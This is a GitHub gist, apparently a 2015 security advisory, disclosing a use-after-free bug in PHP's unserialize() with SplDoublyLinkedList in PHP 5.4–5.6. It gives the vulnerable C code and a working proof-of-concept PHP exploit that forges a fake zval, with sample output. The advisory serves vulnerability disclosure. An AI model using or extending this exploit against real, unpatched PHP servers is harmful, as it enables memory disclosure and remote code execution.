-
-
Save chtg/099f6f54203a4337b2b2 to your computer and use it in GitHub Desktop.
Revisions
-
chtg revised this gist
Aug 7, 2015 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,6 +1,6 @@ #Use After Free Vulnerability in unserialize() with SplDoublyLinkedList Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.7.30 - Release Date: 2015.8.7 > A use-after-free vulnerability was discovered in unserialize() with SplDoublyLinkedList object's deserialization that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely. -
Jul 30, 2015 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,91 @@ #Use After Free Vulnerability in unserialize() with SplDoublyLinkedList Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.7.30 - Release Date: 2015.8.10 > A use-after-free vulnerability was discovered in unserialize() with SplDoublyLinkedList object's deserialization that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely. Affected Versions ------------ Affected is PHP 5.6 < 5.6.12 Affected is PHP 5.5 < 5.5.28 Affected is PHP 5.4 < 5.4.44 Credits ------------ This vulnerability was disclosed by Taoguang Chen. Description ------------ ``` ALLOC_INIT_ZVAL(flags); if (!php_var_unserialize(&flags, &p, s + buf_len, &var_hash TSRMLS_CC) || Z_TYPE_P(flags) != IS_LONG) { zval_ptr_dtor(&flags); goto error; } intern->flags = Z_LVAL_P(flags); zval_ptr_dtor(&flags); <=== free memory ... PHP_VAR_UNSERIALIZE_DESTROY(var_hash); return; ``` The zval_ptr_dtor() leads to &flags is freed from memory. However the unserialize() will still allow to use R: or r: to set references to that already freed memory. It is possible to use-after-free attack and execute arbitrary code remotely. Proof of Concept Exploit ------------ The PoC works on standard MacOSX 10.11 installation of PHP 5.4.43. ``` <?php $fakezval = ptr2str(1122334455); $fakezval .= ptr2str(0); $fakezval .= "\x00\x00\x00\x00"; $fakezval .= "\x01"; $fakezval .= "\x00"; $fakezval .= "\x00\x00"; $inner = 'i:0;'; $exploit = 'a:2:{i:0;C:19:"SplDoublyLinkedList":'.strlen($inner).':{'.$inner.'}i:1;R:3;}'; $data = unserialize($exploit); for ($i = 0; $i < 5; $i++) { $v[$i] = $fakezval.$i; } var_dump($data); function ptr2str($ptr) { $out = ""; for ($i = 0; $i < 8; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } ?> ``` Test the PoC on the command line: ``` $ php uafpoc.php array(2) { [0]=> object(SplDoublyLinkedList)#1 (2) { ["flags":"SplDoublyLinkedList":private]=> int(0) ["dllist":"SplDoublyLinkedList":private]=> array(0) { } } [1]=> int(1122334455) <=== so we can control the memory and create fake ZVAL :) } ```